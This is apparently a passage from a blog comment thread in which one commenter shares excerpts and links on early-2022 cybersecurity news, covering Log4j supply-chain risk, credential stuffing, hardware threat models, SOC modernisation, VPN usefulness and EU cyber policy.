Tokenization – The cloud has changed the economics of ‘encryption’. Tokenization is no longer too expensive to consider. Technically, tokenization offers many advantages over traditional encryption.
Quantum – Some form of quantum computing could, but almost certainly will not, appear in 2022. However, the future threat of quantum decryption is here now. Vendors will announce more methods of quantum-proofing encryption, while nation states will increase the theft of national and trade secrets and PII, pending future decryption.
Adversarial AI – The use of artificial intelligence by criminal groups will increase. It will be used in advanced BEC attacks, and in confusing AI and machine learning defenses.
Ionut Arghire on cybercrime and IoT security:
Ransomware will continue to be a menace to both private and public sectors, critical infrastructure included.
Russia- and China-backed APT groups will be less visible, mainly due to an increase in sophistication.
IoT and software supply chain vulnerabilities will remain a steady occurrence in headlines, but, following 2021’s major attacks, security researchers will focus on the latter. That will result in more high-impact supply chain flaws being discovered.
Counter-operations – Security companies and law enforcement will increase their efforts to identify and dismantle cybercrime rings, but disruptions will most likely be temporary/partial.
Tomi Engdahl says:
Germany: New government plans ‘right to encryption’.
The coalition contract of the newly elected German government contains right to encryption.
https://tutanota.com/blog/posts/germany-right-to-encryption/
Tomi Engdahl says:
Log4j flaw hunt shows how complicated the software supply chain really is
https://www.zdnet.com/article/log4j-flaw-hunt-shows-how-complicated-the-software-supply-chain-really-is/
Open source software is everywhere now, but the Log4j flaw that affects Java enterprise applications is a reminder of what can go wrong in the complicated modern software supply chain. The challenge with the Log4j flaw (also known as Log4Shell) is not only that admins need to patch the flaw — which got a ‘critical’ rating of 10 out of
10 — but that IT folk can’t easily discover whether a product or system is affected by the vulnerability in the component. Google has calculated that approximately 17, 000 Java packages in the Maven Central repository – the most significant Java package repository – were found to contain the vulnerable log4j-core library as a direct or transitive dependency. It found that overall, direct inclusion of Log4j code in artefacts is not as common as the use of Log4j through dependencies. However, it still adds up to hundreds of packages – around 400 – which directly include Log4j code, opening these packages to Log4j vulnerabilities.
Apache Log4j: Mitigation for DevOps
https://www.trendmicro.com/en_us/devops/22/a/apache-log4j-mitigation-for-devops.html
What can DevOps teams do to mitigate Apache Log4j risks? Explore how to secure your apps for today and against future vulnerabilities.
Tomi Engdahl says:
Intercepting 2FA: Over 1200 man-in-the-middle phishing toolkits detected https://blog.malwarebytes.com/reports/2022/01/intercepting-2fa-over-1200-man-in-the-middle-phishing-toolkits-detected/
Two-factor authentication (2FA) has been around for a while now and
Tomi Engdahl says:
Senators Ask DHS, DOT About Transportation Infrastructure Cybersecurity
https://www.securityweek.com/senators-ask-dhs-dot-about-transportation-infrastructure-cybersecurity
Several U.S. senators have sent a letter to the Department of Homeland Security (DHS) and the Department of Transportation (DOT), requesting information about the cybersecurity of the nation’s transportation infrastructure.
The letter was signed by 10 republican and democrat senators led by Jacky Rosen (D-NV) and Roger Wicker (R-MS).
The lawmakers want information on the two departments’ capabilities when it comes to detecting, preventing and responding to cyberattacks. Specifically they are seeking information on how the DHS and DOT are meeting their six responsibilities, as described in the William M. (Mac) Thornberry National Defense Authorization Act for Fiscal Year 2021.
Tomi Engdahl says:
NY AG: Credential Stuffing Impacts 1.1 Million Users at 17 Companies
https://www.securityweek.com/ny-ag-credential-stuffing-impacts-11-million-users-17-companies
Following months of monitoring online communities dedicated to credentials stuffing, a list of 1.1 million impacted customer accounts at 17 well-known companies was compiled, including accounts at food delivery services, online retailers, and restaurant chains.
According to a “Business Guide for Credential Stuffing Attacks” that the New York Attorney General has just released, there are over 15 billion credentials currently circulating on the web. Adversaries are abusing these to launch hundreds of billions of credential stuffing attacks each year.
https://ag.ny.gov/sites/default/files/businessguide-credentialstuffingattacks.pdf
Tomi Engdahl says:
Making PUFs Even More Secure
https://semiengineering.com/making-pufs-even-more-secure/?cmid=88131501-5ef0-4b55-a87d-70e86c1d8d0a
New sources of entropy could significantly improve robustness of physically unclonable functions.
As security has become a must-have in most systems, hardware roots of trust (HRoTs) have started appearing in many chips. Critical to an HRoT is the ability to authenticate and to create keys – ideally from a reliable source that is unviewable and immutable.
“We see hardware roots of trust deployed in two use models — providing a foundation to securely start a system, and enabling a secure enclave for the end user of the SoC,” said Jason Oberg, co-founder and CTO at Tortuga Logic. “Use cases include storing biometric data, customer-programmed encryption/authentication keys, and unique IDs.”
Those keys and IDs are where physically unclonable functions (PUFs) excel. But today, there’s only one PUF technology broadly deployed. New ones are being readied for commercial use, and they leverage new sources of entropy. Even more are in the research stage.
Tomi Engdahl says:
Security Starts With A Threat Assessment
https://semiengineering.com/security-starts-with-a-threat-assessment/?cmid=88131501-5ef0-4b55-a87d-70e86c1d8d0a
The different types of attacks a device might face.
Developing the security architecture for an electronic device begins with building a threat model wherein we ask these questions:
What is the operational environment in which the device needs to function?
What type of attacks can be identified?
What level of access does a potential attacker have to the device?
What possible attack paths can an attacker exploit?
What resources (money, time), expertise and specialized equipment would a potential attacker be willing to expend given the value of assets at risk?
What would be the damage incurred if an attacker successfully obtained control over a device or its data?
Based on the threat assessment, security architects can define the right level of security for their device and how it is to be implemented and maintained. In this blog, let’s take that second question and consider the kinds of attacks that we could expect.
First, let’s consider remote attacks. These are attacks that do not require ‘physical proximity’ of the attacker and the device being attacked. Attacks through a network interface that target rogue software execution on the device processor (e.g., buffer overflow attacks) could enable an attacker to:
Exploit by execution of non-trusted or 3rd-party code
Steal data being sent to or from a device
Attempt to corrupt or replay data in transit
Remote attacks tend to be cheap to perform and scale very well, allowing attacks on other identical devices.
If an attacker can gain physical access to the device, this opens new avenues for exploitation. These “local access” attacks are often categorized into three rough groups, with increasing attack complexity and cost:
Board-level attacks. These attacks can be mounted using simple tools like a screwdriver, a soldering iron, or a JTAG-based debugging tool, replacing components or connecting to the board or chip debug infrastructure. Examples: Flash chip replacement; debug interface access; scan chain/test logic access; inter-chip bus monitoring.
Chip-level non-invasive attacks. This type of attack targets the chip itself while it is in operation without damaging the chip. Attacks of this type typically require the chip to be connected to an oscilloscope and/or dedicated hardware for measuring, capturing, and analyzing electrical behavior of the chip. Side channel attacks such as differential power analysis are well known non-invasive attacks that can successfully reveal used key materials in unprotected implementations.
Chip-level invasive attacks. This class of attacks actually “open up” the chip by removing its packaging, exposing the die to allow direct access to the wiring and memory structures within the chip. To perform an attack like this requires the use of specialized or bespoke equipment that is expensive and complex to operate. Such equipment can sometimes be rented from universities or companies specialized in reverse engineering of chips, but nevertheless, will require a larger investment from the attacker to get to the information sought.
Tomi Engdahl says:
The Second Building Block for the SOC of the Future: An Open Integration Framework
https://www.securityweek.com/second-building-block-soc-future-open-integration-framework
he SOC of the future must be data driven, so it’s essential that systems and tools can work together
As we turn the page on another year and read the columns on “what’s in/what’s out”, one of the trends in cybersecurity that is definitely “in” is Security Operations Center (SOC) modernization. Evidence continues to mount that it isn’t a matter of if, but when and how an organization will be attacked. With that, we see SOCs narrowing the focus of their mission to become detection and response organizations, and they need certain building blocks in place to prepare their SOC for the future.
https://www.securityweek.com/acronyms-aside-soc-future-needs-these-3-capabilities
Tomi Engdahl says:
Defense Contractors Must do More to Conceal Their Attack Surface
https://www.securityweek.com/defense-contractors-must-do-more-conceal-their-attack-surface
The world is entering a new era dominated by the rise of peer competitors like China and Russia, who are increasingly exerting their geo-political influence. After two decades of fighting a counter terrorist focused war where the tools of the US and its allies were far superior, the competitive landscape is changing significantly.
The rise of quantum computing, hypersonic weapons and criminal groups acting on behalf of nation states have changed the calculus and the stakes of twenty-first century warfare. The US and its allies are having to prepare for potential conflicts in Eastern Europe and/or the South China Sea. Both adversaries in such a conflict already possess significant knowledge of US cyber infrastructure and have a consistent history of exploiting these weaknesses.
Meanwhile, the US defense contractor community is charged with building hardware and software that will provide clear strategic and tactical advantages on the battlefield. However, the continuing rise of social engineering tactics as well as risks associated with embedded vulnerabilities in contractor networks makes keeping this technology confidential and out of the hands of adversaries increasingly difficult.
In fact, threat actors have already demonstrated the ability to infiltrate government networks through supply chain attacks such as Solarwinds that compromised at least nine Federal agencies. The close working relationship between defense contractors and the US government poses a significant risk for data leakage in the event of a data breach. In November of last year, a phishing attack against Electronic Warfare Associates confirmed that defense contractors are actively being targeted by adversaries.
Tomi Engdahl says:
The great security delusion: We know what works
https://brand-studio.fortune.com/cisco/the-great-security-delusion-we-know-what-works/?prx_t=CjcHAAAAAAoPEQA&fbclid=IwAR1f8d0XfhMo9koLnV3Ol7LSJajCB37GKFq33sCPu1F9cJKXxcgFZF5mIyo
Why organizations need to adopt evidence-driven security programs and tactics, according to Cisco’s head of advisory CISOs Wendy Nather.
Despite a reality in which we are seeing more frequent and actively dangerous cybersecurity attacks against critical infrastructure, hospitals, enterprises, and our democracy as a whole, security as an industry has been relying on conventional wisdom and hearsay versus practices that show proof of providing strong security outcomes. We can no longer afford to throw all kinds of security spaghetti at the wall to see what sticks. As malicious actors evolve their tactics and the severity of ransomware and data theft increases, so too should our response evolve, from one of hoping what we’ve always done will work to one of evidence-driven security programs and tactics.
More than anything, the report and today’s threats illustrate that we’re all part of the same security ecosystem. This not only includes the business and security practices within one organization—but the intrinsically connected security posture of one organization to another. More than ever, we have shared risk and responsibility. What affects us, affects our neighbors. This means one organization can’t sigh in relief when their neighbor is breached—the probability is that it’s only a matter of time till they are also impacted, as we have seen in many recent supply-chain linked attacks.
At its core, security is a business-level problem, not something relegated to the security team alone. Board members and the C-suite are thinking about security all the time, maybe more than ever—or should be—given the dominance of headlines around the latest attacks. However, if security professionals can’t justify their program strategy beyond best practices, how can they explain it to a board they now report to that relies completely on the security team’s technical expertise?
This is one of the reasons we must seek to connect security process and practices with specific outcomes. This is the most reliable way to maintain an organization and their ecosystems securely.
We need to stop relying on undocumented, unproven “best practices”—or the way we’ve always done things—because they often stem from ignorance that can cause more harm than good. In an era where business costs are under scrutiny, we need to justify expenses with better arguments than “everyone is doing it,” or “it’s new, so we should add it to our arsenal.”
As an example, in the study we asked about threat detection programs. Those that had outsourced programs thought theirs were strongest, but it turns out that if you keep your threat detection in-house, your mean time to respond (MTTR) is much lower (i.e., better). In other words, when security is based on a gut feeling rather than on concrete metrics, you may not be setting up the defense that you want.
Board engagement also spurs compliance. In my experience, board members tend to be quite aware of compliance and regulatory issues and will often support whatever measures are needed to meet compliance standards. This is because the risk of fines is a concrete, well-understood business risk. By the same token, the last two years of the pandemic, driving IT to re-architect its remote access in a hurry as employees went home, the board has grown to appreciate the availability risks.
The more IT and security can interact with the business directly—during frequent feedback loop sessions, for example—the more they will be on the same page about the risks and security measures that will keep the business safe.
In the study, two key strategies scored more beneficial security outcomes than even I would have thought: proactively refreshing your technology and integrating it.
Security, after all, should be seen for what it is: a growth enabler, supporting the business in every aspect of its mission. The more the business side feels supported, the more closely they will work with security before, during, and after a security incident. More importantly, they will engage earlier with security to build in the right processes and controls into every initiative from the beginning, rather than frantically slapping on a layer of security right before a release to production.
There is no shortage of evolving security threats out there today, but I’m still optimistic. Security awareness is growing at all organizational levels. And many teams are coming out of the pandemic with greater agility, flexibility, and support.
What is needed, however, is that shift from simply following best practices and regulatory requirements and a move toward tying security initiatives directly to security efficacy for the business. Outcomes, not best practices, should be the yardstick by which we are measuring.
Tomi Engdahl says:
Cybersecurity and IT/OT convergence: A pathway to digital transformation
https://www.controleng.com/articles/cybersecurity-and-it-ot-convergence-a-pathway-to-digital-transformation/?oly_enc_id=0462E3054934E2U
The history of industrial information technology (IT) set the stage for the Industrial Internet of Things (IIoT) and digital transformation; keep it safe with cybersecurity best practices.
Recognizing the industrial IT “layer”
Many organizations struggle with developing an industrial IT infrastructure that is stable, secure and a foundation that enables the pursuit of smart manufacturing technologies. The commonly cited (and valid) reasons for this include:
The return on investment (ROI) is difficult to calculate, and infrastructure costs are high in general
The technologies and their benefits are not widely understood
The skillsets to maintain the infrastructure are difficult to find.
In addition to and perhaps transcending these challenges, is organizations do not always recognize the infrastructure as its own “layer” within their OT systems. Instead, many — especially those who are not technical — lump the infrastructure together with the control system as one. And by doing so, it makes it difficult or impossible for the organization to identify and invest in infrastructure upgrades.
The most succinct way to demonstrate the detriment by considering how control systems are purchased. When a machine or manufacturing system is procured, the vendor will deploy the system along with some networking hardware, touchscreen PCs and perhaps servers to host the control system. Separately, a different system may be procured, which is deployed with different networking hardware, touchscreen PCs and servers and so on. Before long, the industrial IT within the facility is inconsistent, fragmented, difficult to manage and difficult to integrate into one seamless architecture.
When it comes to acknowledging the industrial IT “layer,” an important observation is most organizations’ IT departments already understand the technologies in use. IT departments can help by spearheading infrastructure requirements and standardization efforts for the industrial environment and being included in conversations at the earliest stages of the procurement process.
The stages of industrial IT maturity
Organizations — especially those experiencing the evolution for the first time — can benefit from following industry best practices and by following in the footsteps of other organizations. By doing so, the total cost required to achieve a mature and optimized industrial IT environment can be reduced and rollout can be done within a shorter timeline.
Stage 1: Islands of automation. When beginning the manufacturing digitalization journey, leaders may not be familiar with the value of enhanced connectivity or, if they are, it’s considered a problem that does not yet need to be addressed. In their minds, the priority is manufacturing to meet customer demand and reducing investment costs to keep operations lean. Often, the output of this type of thought process is installing original equipment manufacturer (OEM) equipment and systems that operate independently and within their own networked environment.
It is not uncommon to see connectivity between systems being addressed in some locations, but not all locations.
Stage 2: Flat, connected industrial network. Eventually, the operational pains of having islands of automation and the ways it restricts progress force the organization to re-engineer its industrial IT architecture. In the absence of a higher-level plan, the operational staff makes do with the resources and time available, and change is made via “the path of least resistance.”
This manifests itself as low-cost, unmanaged switches being installed where physical space can be found and wherever an Ethernet connection is needed. Workstations meant for monitoring or controlling industrial systems may have internet connectivity to make staff’s day-to-day obligations simpler without thought toward security implications.
When OEM equipment is purchased, it is shipped to the owner with pre-configured IP addresses, so staff installs a gateway to bridge the new equipment to the plant’s existing network.
Stage 3: Architected infrastructure. Organizations operating with flat, connected industrial networks can face pressure on several fronts to invest in industrial IT improvements. Organizations will start to understand the value in digital transformation technologies, use them to remain competitive and may realize they must invest in their infrastructure to pursue those technologies. Operational inefficiencies, staff frustration and downtime attributed to the lack of standardization and management of an organization’s infrastructure may convince leaders to set aside funds for improving the infrastructure.
Regardless of which pressure tips the scale, most organizations will turn to validated architectures and industry best practices for further improving their connectivity and (finally) start to prioritize security. Within their computing infrastructure, investments will be made in server virtualizations and standardized hardware. Organizations may also invest in thin client deployments and other remote connectivity solutions to centralize the way they host and access industrial applications across facilities. In terms of networking, virtual local area networks (VLANs) may be implemented to segment the network and demilitarized zones (DMZs) may be installed for management and IT/OT connectivity.
Stage 4: Managed ICS security and cloud technologies. Once an organization has an underlying industrial IT infrastructure following best practices and standard architectures, they will be well-suited for implementing Industry 4.0 technologies and optimizing their operations. Plant floor data can be collected and analyzed to improve overall equipment effectiveness (OEE) or quality, and data may be synchronized to the organization’s enterprise resource planning (ERP) in real time to improve business decision making such as managing supplies and product orders.
Just as the organization experienced during its transition from having islands of automation to a connected industrial network, the ICS security risks increase as connectivity is expanded and infrastructure improvements are made. Technical configurations alone — such as VLAN segmentation — are not sufficient for managing the cybersecurity risks, and a continuous cybersecurity program akin to a safety program is required to manage the ongoing risk.
Tomi Engdahl says:
Industrial access on the go
Adoption of industrial automation mobile access continues to increase, as technologies improve, and user concerns are addressed.
https://www.controleng.com/articles/industrial-access-on-the-go/?oly_enc_id=0462E3054934E2U
Tomi Engdahl says:
2021 CWE Most Important Hardware Weaknesses
https://cwe.mitre.org/index.html
first of its kind, community-developed list of hardware weaknesses with detailed descriptions and authoritative guidance for mitigating and avoiding them.
https://cwe.mitre.org/scoring/lists/2021_CWE_MIHW.html
Tomi Engdahl says:
The Art of CISO – Master of Warfare
https://pentestmag.com/the-art-of-ciso-master-of-warfare/
Tomi Engdahl says:
https://pentestmag.com/sql-injection-to-rce/
Tomi Engdahl says:
Tietosuojavaltuutettu: Log4j-haavoittuvuudesta aiheutuneesta tietomurrosta on ilmoitettava
https://www.kauppalehti.fi/uutiset/tietosuojavaltuutettu-log4j-haavoittuvuudesta-aiheutuneesta-tietomurrosta-on-ilmoitettava/fd919778-753d-4375-ad8a-609cf6fdea17
Mikäli henkilötietoja on vaarantunut Log4j-hyökkäyksen takia, myös asianomaisille henkilöille tulee ilmoittaa.
Tomi Engdahl says:
It’s probably time to say goodbye to your VPN
https://www.nbcnews.com/tech/internet/vpns-encryption-wifi-rcna9348
VPNs, or virtual private networks, continue to be used by millions of people as a way of masking their internet activity by encrypting their location and web traffic.
But on the modern internet, most people can safely ditch them, thanks to the widespread use of encryption that has made public internet connections far less of a security threat, cybersecurity experts say.
“Most commercial VPNs are snake oil from a security standpoint,” said Nicholas Weaver, a cybersecurity lecturer at the University of California, Berkeley. “They don’t improve your security at all.”
It’s a development that highlights how the cybersecurity landscape has changed: Hackers are less likely to target people’s individual devices and instead focus on the login information to their most important accounts.
5 Red-Hot Metaverse Stocks to Buy Right…
AdEmpire Financial Research
For years, experts warned it was dangerous for average people to use the Wi-Fi at a public place like a coffee shop without taking steps to obscure their internet traffic. Someone sharing a Wi-Fi network with strangers was essentially sharing all their traffic with others who were using it. If someone decided to check their bank balance, for example, they ran the risk of a nearby hacker being able to steal sensitive information.
VPNs offered a way to counter that problem. VPNs reroute a user’s internet traffic through their own servers. That can slow browsing speed, but provides the benefit of hiding a user’s Internet Protocol address — which includes their general location — from the websites they visit.
But that’s no longer the problem it once was. Most browsers have quietly implemented an added layer of security in recent years that automatically encrypts internet traffic at most sites with a technology called HTTPS. Indicated by a tiny padlock by the URL, the presence of HTTPS means that worrisome scenario, in which a scammer or a hacker squats on a public Wi-Fi connection in order to watch people’s internet habits, isn’t feasible.
It’s not clear that the threat of a hacker at your coffee shop was ever that real to begin with, but it is certainly not a major danger now, Weaver said.
“Remember, someone attacking you at the coffee shop needs to be basically AT the coffee shop,” he said. “I don’t know of them ever being used outside of pranks. And those are all irrelevant now with most sites using HTTPS,” he said in a text message.
There are still valid uses for VPNs. They’re an invaluable tool for getting around certain types of censorship, though other options also exist, such as the Tor Browser, a free web browser that automatically reroutes users’ traffic and is widely praised by cybersecurity experts.
VPNs are also vital for businesses that need their employees to log in remotely to their internal network. And they’re a popular and effective way to watch television shows and movies that are restricted to particular countries on streaming services.
But like with antivirus software, the paid VPN industry is a booming global market despite its core mission no longer being necessary for many people. Most VPNs market their products as a security tool. A Consumer Reports investigation published earlier this month found that 12 of the 16 biggest VPNs make hyperbolic claims or mislead customers about their security benefits. And many can make things worse, either by selling customers’ browsing history to data brokers, or by having poor cybersecurity.
The fix is largely thanks to activists who have pushed for more than a decade for a safer way to browse the internet.
In 2010, cybersecurity activists at the Electronic Frontier Foundation, an internet freedom advocacy group, launched a project to encrypt as much web traffic as possible by developing browser extensions to let users toggle HTTPS and giving websites free tools to enable it.
As more and more people started using HTTPS wherever possible, some of the companies that help most people use the internet got on board. In 2015, Google started prioritizing websites that enabled HTTPS in its search results. More and more websites started offering HTTPS connections, and now practically all sites that Google links to do so.
Since late 2020, major browsers such as Brave, Chrome, Firefox, Safari and Edge all built HTTPS into their programs, making Electronic Frontier Foundation’s browser extension no longer necessary for most people.
“Years ago, nobody could imagine that. It’s kind of one of those background wins,” said Alexis Hancock, who oversees the HTTPS project as the foundation’s director of engineering.
Users now need to worry far less about being hacked by a fellow coffee shop patron than by a hacker simply sending an email from anywhere around the world to trick them into giving up their passwords and other sensitive information, she said.
Hackers “would likely do a phishing attack on you before they would walk into a cafe with free Wi-Fi,” Hancock said. “Sending people nefarious emails, it’s much easier to do that kind of campaign. Those have been tried and true, unfortunately,” she said.
Tomi Engdahl says:
NIST SP 800-171 CUI Sanitization and Destruction Methods
November 16, 2021
Learn how to meet your NIST SP 800-171 media sanitization and destruction requirements.
https://cubcyber.com/nist-sp-800-171-cui-sanitation-and-destruction-methods
Tomi Engdahl says:
https://www.businessopas.fi/kauppa/tietoturvaa-tarvitaan-kaikilla-toimialoilla/#
Tomi Engdahl says:
6 Must-Have Open-Source Tools to Secure Your Linux Server
BY WINI BHALLA
PUBLISHED JUL 14, 2021
Don’t want to compromise on the security of your Linux server? Install these six tools to set up an impenetrable network.
https://www.makeuseof.com/open-source-tools-to-secure-linux-server/
Tomi Engdahl says:
The great security delusion: We know what works
Why organizations need to adopt evidence-driven security programs and tactics, according to Cisco’s head of advisory CISOs Wendy Nather.
https://brand-studio.fortune.com/cisco/the-great-security-delusion-we-know-what-works/?prx_t=CjcHAAAAAAoPEQA&fbclid=IwAR2pcydYEHo1N8DiojnqGW4Vhc9thibIW8AvrGvERVxj1wbQFp8jwFOoL9A
Tomi Engdahl says:
Rethinking Cybersecurity Jobs as a Vocation Instead of a Profession
https://www.darkreading.com/careers-and-people/rethinking-cybersecurity-jobs-as-a-vocation-instead-of-a-profession
The prevailing mindset is that security practitioners are professionals, and thus, require a college degree. But there are some flaws in that logic.
Tomi Engdahl says:
Crack WPA/WPA2 Wi-Fi Routers with Aircrack-ng and Hashcat by Brannon Dorsey
https://hakin9.org/crack-wpa-wpa2-wi-fi-routers-with-aircrack-ng-and-hashcat/
Tomi Engdahl says:
Codex Exposed: Exploring the Capabilities and Risks of OpenAI’s Code Generator https://www.trendmicro.com/en_us/research/22/a/codex-exposed–exploring-the-capabilities-and-risks-of-openai-s-.html
The first of a series of blog posts examines the security risks of Codex, a code generator powered by the GPT-3 engine.
Tomi Engdahl says:
Organized Cybercrime Cases: What CISOs Need to Know https://www.trendmicro.com/en_us/ciso/22/a/organized-cybercrime-what-cisos-need-to-know.html
Recently, Trend Micro Research analyzed a new service offering, called Access as a Service (AaaS), in the undergrounds whereby malicious actors are selling access into business networks. AaaS is part of a developing trend in cybercrime, which is the increased specialization of services within CaaS and increased collaboration among these groups. Thinking from an incident response mentality, this means they will have to identify these different groups completing specific aspects of the overall attack, making it tougher to detect and stop attacks.
Tomi Engdahl says:
WebSpec, a formal framework for browser security analysis, reveals new cookie attack https://www.theregister.com/2022/01/08/webspec_browser_security/
Folks at Technische Universität Wien in Austria have devised a formal security framework called WebSpec to analyze browser security. And they’ve used it to identify multiple logical flaws affecting web browsers, revealing a new cookie-based attack and an unresolved Content Security Policy contradiction. These logical flaws are not necessarily security vulnerabilities, but they can be. They’re inconsistencies between Web platform specifications and the way these specs actually get implemented within web browsers.
Tomi Engdahl says:
Extracting Cobalt Strike Beacons from MSBuild Scripts https://isc.sans.edu/forums/diary/Extracting+Cobalt+Strike+Beacons+from+MSBuild+Scripts/28200/
Tomi Engdahl says:
The Second Building Block for the SOC of the Future: An Open Integration Framework
https://www.securityweek.com/second-building-block-soc-future-open-integration-framework
Tomi Engdahl says:
The blame game: EU criticized for fragmented and slow’ approach to cyber-attack attribution https://portswigger.net/daily-swig/the-blame-game-eu-criticized-for-fragmented-and-slow-approach-to-cyber-attack-attribution
The European Union lacks coherence when it comes to responding to cyber-attacks because of problems surrounding attribution, a new report warns. In Attribution: A Major Challenge for EU Cyber Sanctions’, Annegret Bendiek and Matthias Schulze of the German Institute for International and Security Affairs analyze the policy responses to the WannaCry, NotPetya, Cloud Hopper, OPCW, and Bundestag cybersecurity incidents and conclude that the process of attribution tends to be fragmented and slow. “Right now, every member state does its own attribution and political and legal assessment of cyber-incidents, ” Schulze tells The Daily Swig. “Since capabilities vary, it is possible that member states assess the same incident quite differently and this leads to a fragmented response. also:
https://www.swp-berlin.org/en/publication/attribution-a-major-challenge-for-eu-cyber-sanctions#hd-d41750e3739
Tomi Engdahl says:
Europol ordered to erase data on those not linked to crime https://www.bleepingcomputer.com/news/security/europol-ordered-to-erase-data-on-those-not-linked-to-crime/
The European Data Protection Supervisor (EDPS), an EU privacy and data protection independent supervisory authority, has ordered Europol to erase personal data on individuals that haven’t been linked to criminal activity. The EU data watchdog issued this order after admonishing Europol in September 2020 for storing large amounts of data on individuals that haven’t been linked to criminal activity, putting their fundamental rights at risk.
Tomi Engdahl says:
Cyber Command partners with US universities to prepare graduates for military cyber roles https://therecord.media/cyber-command-partners-with-us-universities-to-prepare-graduates-for-military-cyber-roles/
US Cyber Command announced last week a partnership with 84 colleges and universities from 34 states and the District of Columbia aimed at educating and preparing graduates for cybersecurity roles in the US military.